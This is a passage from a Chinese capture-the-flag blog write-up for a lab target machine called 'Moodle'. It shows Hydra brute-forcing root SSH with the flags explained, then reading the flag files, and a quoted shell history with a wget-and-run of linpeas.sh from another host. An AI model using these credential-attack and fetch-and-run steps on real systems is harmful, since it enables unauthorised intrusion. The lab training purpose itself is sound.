class="string">&quot;root&quot;</span> - pass <span class="string">&quot;sF6Kfzr69w7dyZALAhl6&quot;</span> - 7 of 54060 [child 3] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;PubkeyAuthentication&quot;</span> - 8 of 54060 [child 2] (0/0)</span><br><span class="line">[22][ssh] host: 192.168.3.192   login: root   password: sF6Kfzr69w7dyZALAhl6</span><br><span class="line">[STATUS] attack finished <span class="keyword">for</span> 192.168.3.192 (valid pair found)</span><br><span class="line">1 of 1 target successfully completed, 1 valid password found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-13 22:52:50</span><br></pre></td></tr></table></figure>
<p><strong>爆破结果</strong><br><code>user</code>: <code>root</code><br><code>pass</code>: <code>sF6Kfzr69w7dyZALAhl6</code></p>
<blockquote>
<p>[!NOTE] 代码说明</p>
<ul>
<li><p><code>-I</code>：忽略之前的破解缓存记录，<strong>强制重新开始新一轮破解</strong>。Hydra 默认会记录已尝试过的用户名 &#x2F; 密码组合（避免重复尝试），生成缓存文件，<code>-I</code> 参数会跳过缓存，从头开始遍历字典文件。</p>
</li>
<li><p><code>-f</code>：<strong>找到第一个有效（正确）的用户名 &#x2F; 密码组合后，立即停止破解</strong>，不再继续遍历字典文件剩余内容。适合只需要获取一个有效凭据的场景，能节省大量时间。</p>
</li>
<li><p><code>-vV</code>：开启<strong>最高级别的详细输出模式</strong>（<code>-v</code> 为详细模式，<code>-V</code> 为更详细的冗余模式，叠加 <code>-vV</code> 输出最完整的日志）。会显示每个尝试的密码组合、连接状态、破解进度、最终结果等，方便排查问题和查看破解过程。- <code>-t 4</code>：指定本次破解的<strong>并发线程数为 4</strong>。即同时开启 4 个连接尝试密码，线程数越高破解速度相对越快，但过高可能会被目标主机的防火墙、SSH 服务限制（如触发连接频率限制），通常建议 4-10 个线程。</p>
</li>
<li><p><code>-l root</code>：指定<strong>单个固定的登录用户名 <code>root</code></strong>（小写 <code>l</code>，对应 <code>login</code>）。该参数用于指定单一用户名，若需要批量尝试多个用户名，需使用大写 <code>-L</code> 后跟用户名字典文件（如 <code>-L user.txt</code>）。</p>
</li>
<li><p><code>-P a.txt</code>：指定<strong>密码字典文件为 <code>a.txt</code></strong>（大写 <code>P</code>，对应 <code>password</code>）。该文件需提前准备，格式为每行一个密码，Hydra 会逐行读取文件中的密码进行尝试。注意区分小写 <code>-p</code>（用于指定单个固定密码，如 <code>-p 123456</code>）。</p>
</li>
</ul>
</blockquote>
<p>进入<code>root</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">kotori@Moodle:~$ su</span><br><span class="line">Password: </span><br><span class="line">root@Moodle:/home/kotori# <span class="built_in">ls</span></span><br><span class="line">a.txt  linpeas.sh  user.txt</span><br><span class="line">root@Moodle:/home/kotori# <span class="built_in">id</span></span><br><span class="line">uid=0(root) gid=0(root) <span class="built_in">groups</span>=0(root)</span><br><span class="line">root@Moodle:/home/kotori# <span class="built_in">cat</span> user.txt </span><br><span class="line">flag&#123;user-de7202216bc84a6aa04762061c9e9ad2&#125;</span><br><span class="line">root@Moodle:/home/kotori# <span class="built_in">cd</span> /root</span><br><span class="line">root@Moodle:~# <span class="built_in">ls</span></span><br><span class="line">rootpass.txt  root.txt</span><br><span class="line">root@Moodle:~# <span class="built_in">cat</span> root.txt </span><br><span class="line">flag&#123;root-ea6233d6aa262b93419775a51a8cc1df&#125;</span><br></pre></td></tr></table></figure>

<h3 id="方案二"><a href="#方案二" class="headerlink" title="方案二"></a>方案二</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">kotori@Moodle:~$ <span class="built_in">cat</span> .bash_history </span><br><span class="line">last</span><br><span class="line"><span class="built_in">exit</span></span><br><span class="line"><span class="built_in">ls</span> al</span><br><span class="line"><span class="built_in">ls</span>- al</span><br><span class="line">wget 192.168.3.94/linpeas.sh</span><br><span class="line">bash linpeas.sh </span><br><span class="line"><span class="built_in">exit</span></span><br></pre></td></tr></table></figure>

<p><img src="/assets/Pasted%20image%2020260113230641.png"><br><code>last</code>默认只显示精简的登录记录，要查看详细信息，使用 <code>-F</code>（完整时间）、<code>-i</code>（显示<code>IP</code> 数字格式）、<code>-w</code>（完整用户名）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">kotori@Moodle:~$ last -F -i -w</span><br><span class="line">kotori   pts/1        192.168.3.48     Tue Jan 13 09:45:18 2026   still logged <span class="keyword">in</span></span><br><span class="line">reboot   system boot  0.0.0.0          Tue Jan 13 08:45:58 2026   still running</span><br><span class="line">root     pts/0        192.168.3.94     Fri Dec 26 23:13:35 2025 - crash                    (17+09:32)</span><br><span class="line">reboot   system boot  0.0.0.0          Fri Dec 26 23:13:00 2025   still running</span><br><span class="line">sF6Kfzr69w7dyZALAhl6 pts/1        192.168.3.94  </span><br><span class="line">·······</span><br></pre></td></tr></table></figure>
<p><img src="/assets/Pasted%20image%2020260113230744.png"><br>同样获得密码 <code>sF6Kfzr69w7dyZALAhl6</code></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/05/03/%E9%9D%B6%E6%9C%BA/QQGroup/Mosh/" rel="prev" title="Mosh">
      <i class="fa fa-chevron-left"></i> Mosh
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/05/03/%E9%9D%B6%E6%9C%BA/QQGroup/Hellman/" rel="next" title="Hellman">
      Hellman <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E6%90%9C%E5%AF%BB"><span class="nav-number">1.</span> <span class="nav-text">1.搜寻</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap"><span class="nav-number">1.1.</span> <span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wfuzz-%E5%AD%90%E5%9F%9F%E5%90%8D"><span class="nav-number">1.2.</span> <span class="nav-text">wfuzz 子域名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dirsearch"><span class="nav-number">1.3.</span> <span class="nav-text">dirsearch</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E5%88%86%E6%9E%90"><span class="nav-number">2.</span> <span class="nav-text">2.分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#curl"><span class="nav-number">2.1.</span> <span class="nav-text">curl</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#login"><span class="nav-number">2.2.</span> <span class="nav-text">login</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hackbar"><span class="nav-number">2.3.</span> <span class="nav-text">hackbar</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E8%BF%9B%E5%85%A5%E7%B3%BB%E7%BB%9F"><span class="nav-number">3.</span> <span class="nav-text">3.进入系统</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%A1%88%E4%B8%80"><span class="nav-number">3.1.</span> <span class="nav-text">方案一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%A1%88%E4%BA%8C"><span class="nav-number">3.2.</span> <span class="nav-text">方案二</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zhaochoudecat"
      src="/images/saber.jpg">
  <p class="site-author-name" itemprop="name">zhaochoudecat</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


<div class="saber-gallery motion-element">
  <div class="saber-gallery-container" id="saberGallery">
    <div class="saber-gallery-track">
      <img class="saber-gallery-img" src="/images/blue_saber.png" alt="Blue Saber" data-index="0">
      <img class="saber-gallery-img" src="/images/daily_saber.png" alt="Daily Saber" data-index="1">
      <img class="saber-gallery-img" src="/images/dark_saber.png" alt="Dark Saber" data-index="2">
    </div>
    <button class="saber-gallery-arrow saber-gallery-prev" id="saberPrev" aria-label="上一张">
      <i class="fa fa-chevron-left"></i>
    </button>
    <button class="saber-gallery-arrow saber-gallery-next" id="saberNext" aria-label="下一张">
      <i class="fa fa-chevron-right"></i>
    </button>
    <div class="saber-gallery-dots">
      <span class="saber-gallery-dot active"></span>
      <span class="saber-gallery-dot"></span>
      <span class="saber-gallery-dot"></span>
    </div>
  </div>
</div>

<div class="saber-lightbox" id="saberLightbox">
  <div class="saber-lightbox-overlay"></div>
  <button class="saber-lightbox-close" id="saberLightboxClose" aria-label="关闭">
    <i class="fa fa-times"></i>
  </button>
  <button class="saber-lightbox-arrow saber-lightbox-prev" id="saberLightboxPrev" aria-label="上一张">
    <i class="fa fa-chevron-left"></i>
  </button>
  <button class="saber-lightbox-arrow saber-lightbox-next" id="saberLightboxNext" aria-label="下一张">
    <i class="fa fa-chevron-right"></i>
  </button>
  <div class="saber-lightbox-content">
    <img class="saber-lightbox-img" id="saberLightboxImg" src="" alt="">
  </div>
  <div class="saber-lightbox-counter" id="saberLightboxCounter"></div>
</div>

<style>
.saber-gallery {
  margin-top: 15px;
  text-align: center;
}
.saber-gallery-container {
  position: relative;
  width: 100%;
  height: 280px;
  overflow: hidden;
  border-radius: 8px;
  cursor: pointer;
  user-select: none;
  -webkit-user-select: none;
}
.saber-gallery-container:active {
  cursor: pointer;
}
.saber-gallery-track {
  display: flex;
  height: 100%;
  transition: transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  will-change: transform;
}
.saber-gallery-img {
  flex-shrink: 0;
  width: 100%;
  height: 100%;
  object-fit: contain;
  object-position: center;
  pointer-events: none;
}
.saber-gallery-arrow {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  width: 32px;
  height: 32px;
  border: none;
  border-radius: 50%;
  background: rgba(0, 0, 0, 0.4);
  color: #fff;
  font-size: 14px;
  cursor: pointer;
  opacity: 0;
  transition: opacity 0.3s ease, background 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
  z-index: 2;
}
.saber-gallery-container:hover .saber-gallery-arrow {
  opacity: 1;
}
.saber-gallery-arrow:hover {
  background: rgba(0, 0, 0, 0.7);
}
.saber-gallery-arrow.disabled {
  opacity: 0.2 !important;
  cursor: not-allowed;
}
.saber-gallery-prev {
  left: 8px;
}
.saber-gallery-next {
  right: 8px;
}
.saber-gallery-dots {
  position: absolute;
  bottom: 10px;
  left: 50%;
  transform: translateX(-50%);
  display: flex;
  gap: 6px;
  z-index: 2;
}
.saber-gallery-dot {
  width: 6px;
  height: 6px;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.5);
  transition: background 0.3s ease, transform 0.3s ease;
  cursor: pointer;
}
.saber-gallery-dot.active {
  background: rgba(255, 255, 255, 0.95);
  transform: scale(1.3);
}

/* Lightbox Styles */
.saber-lightbox {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: 9999;
  display: none;
  opacity: 0;
  transition: opacity 0.3s ease;
}
.saber-lightbox.active {
  display: flex;
  opacity: 1;
}
.saber-lightbox-overlay {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.92);
  cursor: pointer;
}
.saber-lightbox-content {
  position: relative;
  z-index: 2;
  margin: auto;
  max-width: 90vw;
  max-height: 90vh;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-img {
  max-width: 100%;
  max-height: 90vh;
  object-fit: contain;
  border-radius: 4px;
  transform: scale(0.8);
  transition: transform 0.3s cubic-bezier(0.25, 0.46, 0.45, 0.94);
}
.saber-lightbox.active .saber-lightbox-img {
  transform: scale(1);
}
.saber-lightbox-close {
  position: absolute;
  top: 20px;
  right: 30px;
  width: 40px;
  height: 40px;
  border: none;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.15);
  color: #fff;
  font-size: 18px;
  cursor: pointer;
  z-index: 3;
  transition: background 0.3s ease, transform 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-close:hover {
  background: rgba(255, 255, 255, 0.3);
  transform: rotate(90deg);
}
.saber-lightbox-arrow {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  width: 50px;
  height: 50px;
  border: none;
  border-radius: 50%;
  background: rgba(255, 255, 255, 0.15);
  color: #fff;
  font-size: 20px;
  cursor: pointer;
  z-index: 3;
  transition: background 0.3s ease, opacity 0.3s ease;
  display: flex;
  align-items: center;
  justify-content: center;
}
.saber-lightbox-arrow:hover {
  background: rgba(255, 255, 255, 0.3);
}
.saber-lightbox-arrow.disabled {
  opacity: 0.2;
  cursor: not-allowed;
}
.saber-lightbox-prev {
  left: 20px;
}
.saber-lightbox-next {
  right: 20px;
}
.saber-lightbox-counter {
  position: absolute;
  bottom: 20px;
  left: 50%;
  transform: translateX(-50%);
  color: rgba(255, 255, 255, 0.8);
  font-size: 14px;
  z-index: 3;
  letter-spacing: 2px;
}

@media (max-width: 768px) {
  .saber-lightbox-arrow {
    width: 40px;
    height: 40px;
    font-size: 16px;
  }
  .saber-lightbox-prev {
    left: 10px;
  }
  .saber-lightbox-next {
    right: 10px;
  }
  .saber-lightbox-close {
    top: 10px;
    right: 15px;
    width: 36px;
    height: 36px;
    font-size: 16px;
  }
}
</style>

<script>
(function() {
  // Gallery Logic
  var container = document.getElementById('saberGallery');
  var track = container.querySelector('.saber-gallery-track');
  var images = container.querySelectorAll('.saber-gallery-img');
  var dots = container.querySelectorAll('.saber-gallery-dot');
  var prevBtn = document.getElementById('saberPrev');
  var nextBtn = document.getElementById('saberNext');
  var current = 0;
  var total = images.length;
  var autoInterval = 15000;
  var timer = null;

  function goTo(index) {
    if (index < 0) index = 0;
    if (index >= total) index = total - 1;
    current = index;
    track.style.transform = 'translateX(-' + (current * 100) + '%)';
    dots.forEach(function(dot, i) {
      dot.classList.toggle('active', i === current);
    });
    updateArrows();
  }

  function updateArrows() {
    prevBtn.classList.toggle('disabled', current === 0);
    nextBtn.classList.toggle('disabled', current === total - 1);
  }

  function next() {
    if (current < total - 1) {
      goTo(current + 1);
    }
  }

  function prev() {
    if (current > 0) {
      goTo(current - 1);
    }
  }

  function startAuto() {
    timer = setInterval(function() {
      if (current < total - 1) {
        goTo(current + 1);
      } else {
        goTo(0);
      }
    }, autoInterval);
  }

  function stopAuto() {
    clearInterval(timer);
  }

  prevBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    stopAuto();
    prev();
    startAuto();
  });

  nextBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    stopAuto();
    next();
    startAuto();
  });

  dots.forEach(function(dot, i) {
    dot.addEventListener('click', function(e) {
      e.stopPropagation();
      stopAuto();
      goTo(i);
      startAuto();
    });
  });

  // Touch swipe support
  var startX = 0;
  var startY = 0;
  var isDragging = false;
  var currentTranslate = 0;
  var prevTranslate = 0;

  container.addEventListener('touchstart', function(e) {
    startX = e.touches[0].clientX;
    startY = e.touches[0].clientY;
    isDragging = true;
    stopAuto();
    track.style.transition = 'none';
  }, { passive: true });

  container.addEventListener('touchmove', function(e) {
    if (!isDragging) return;
    var diffX = e.touches[0].clientX - startX;
    var diffY = e.touches[0].clientY - startY;
    if (Math.abs(diffX) > Math.abs(diffY)) {
      currentTranslate = prevTranslate + diffX;
      track.style.transform = 'translateX(' + currentTranslate + 'px)';
    }
  }, { passive: true });

  container.addEventListener('touchend', function(e) {
    if (!isDragging) return;
    isDragging = false;
    track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
    var diffX = e.changedTouches[0].clientX - startX;
    if (Math.abs(diffX) > 50) {
      if (diffX > 0 && current > 0) {
        prev();
      } else if (diffX < 0 && current < total - 1) {
        next();
      } else {
        goTo(current);
      }
    } else {
      goTo(current);
    }
    prevTranslate = -(current * container.offsetWidth);
    startAuto();
  });

  // Mouse drag support
  var mouseDown = false;
  container.addEventListener('mousedown', function(e) {
    mouseDown = true;
    startX = e.clientX;
    stopAuto();
    track.style.transition = 'none';
    e.preventDefault();
  });

  container.addEventListener('mousemove', function(e) {
    if (!mouseDown) return;
    var diffX = e.clientX - startX;
    currentTranslate = prevTranslate + diffX;
    track.style.transform = 'translateX(' + currentTranslate + 'px)';
  });

  container.addEventListener('mouseup', function(e) {
    if (!mouseDown) return;
    mouseDown = false;
    track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
    var diffX = e.clientX - startX;
    if (Math.abs(diffX) > 50) {
      if (diffX > 0 && current > 0) {
        prev();
      } else if (diffX < 0 && current < total - 1) {
        next();
      } else {
        goTo(current);
      }
    } else {
      goTo(current);
    }
    prevTranslate = -(current * container.offsetWidth);
    startAuto();
  });

  container.addEventListener('mouseleave', function() {
    if (mouseDown) {
      mouseDown = false;
      track.style.transition = 'transform 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94)';
      goTo(current);
      prevTranslate = -(current * container.offsetWidth);
      startAuto();
    }
  });

  window.addEventListener('resize', function() {
    prevTranslate = -(current * container.offsetWidth);
  });

  // Lightbox Logic
  var lightbox = document.getElementById('saberLightbox');
  var lightboxImg = document.getElementById('saberLightboxImg');
  var lightboxClose = document.getElementById('saberLightboxClose');
  var lightboxPrevBtn = document.getElementById('saberLightboxPrev');
  var lightboxNextBtn = document.getElementById('saberLightboxNext');
  var lightboxCounter = document.getElementById('saberLightboxCounter');
  var lightboxOverlay = lightbox.querySelector('.saber-lightbox-overlay');
  var lightboxCurrent = 0;
  var imgSources = Array.from(images).map(function(img) { return img.src; });

  function openLightbox(index) {
    lightboxCurrent = index;
    lightboxImg.src = imgSources[lightboxCurrent];
    updateLightboxCounter();
    updateLightboxArrows();
    lightbox.style.display = 'flex';
    document.body.style.overflow = 'hidden';
    // Force reflow
    lightbox.offsetHeight;
    lightbox.classList.add('active');
    stopAuto();
  }

  function closeLightbox() {
    lightbox.classList.remove('active');
    document.body.style.overflow = '';
    setTimeout(function() {
      lightbox.style.display = 'none';
      lightboxImg.src = '';
      startAuto();
    }, 300);
  }

  function updateLightboxCounter() {
    lightboxCounter.textContent = (lightboxCurrent + 1) + ' / ' + total;
  }

  function updateLightboxArrows() {
    lightboxPrevBtn.classList.toggle('disabled', lightboxCurrent === 0);
    lightboxNextBtn.classList.toggle('disabled', lightboxCurrent === total - 1);
  }

  function lightboxGoTo(index) {
    if (index < 0 || index >= total) return;
    lightboxCurrent = index;
    lightboxImg.style.opacity = '0.5';
    setTimeout(function() {
      lightboxImg.src = imgSources[lightboxCurrent];
      lightboxImg.style.opacity = '1';
      updateLightboxCounter();
      updateLightboxArrows();
    }, 150);
  }

  function lightboxNext() {
    if (lightboxCurrent < total - 1) {
      lightboxGoTo(lightboxCurrent + 1);
    }
  }

  function lightboxPrev() {
    if (lightboxCurrent > 0) {
      lightboxGoTo(lightboxCurrent - 1);
    }
  }

  // Click on gallery image to open lightbox
  container.addEventListener('click', function(e) {
    if (e.target.closest('.saber-gallery-arrow') || e.target.closest('.saber-gallery-dots')) return;
    openLightbox(current);
  });

  lightboxClose.addEventListener('click', closeLightbox);
  lightboxOverlay.addEventListener('click', closeLightbox);

  lightboxPrevBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    lightboxPrev();
  });

  lightboxNextBtn.addEventListener('click', function(e) {
    e.stopPropagation();
    lightboxNext();
  });

  // Keyboard navigation
  document.addEventListener('keydown', function(e) {
    if (!lightbox.classList.contains('active')) return;
    if (e.key === 'Escape') {
      closeLightbox();
    } else if (e.key === 'ArrowLeft') {
      lightboxPrev();
    } else if (e.key === 'ArrowRight') {
      lightboxNext();
    }
  });

  // Swipe in lightbox
  var lbStartX = 0;
  lightbox.addEventListener('touchstart', function(e) {
    lbStartX = e.touches[0].clientX;
  }, { passive: true });

  lightbox.addEventListener('touchend', function(e) {
    var diffX = e.changedTouches[0].clientX - lbStartX;
    if (Math.abs(diffX) > 80) {
      if (diffX > 0) {
        lightboxPrev();
      } else {
        lightboxNext();
      }
    }
  }, { passive: true });

  // Initialize
  prevTranslate = 0;
  updateArrows();
  startAuto();
})();
</script>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhaochoudecat</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
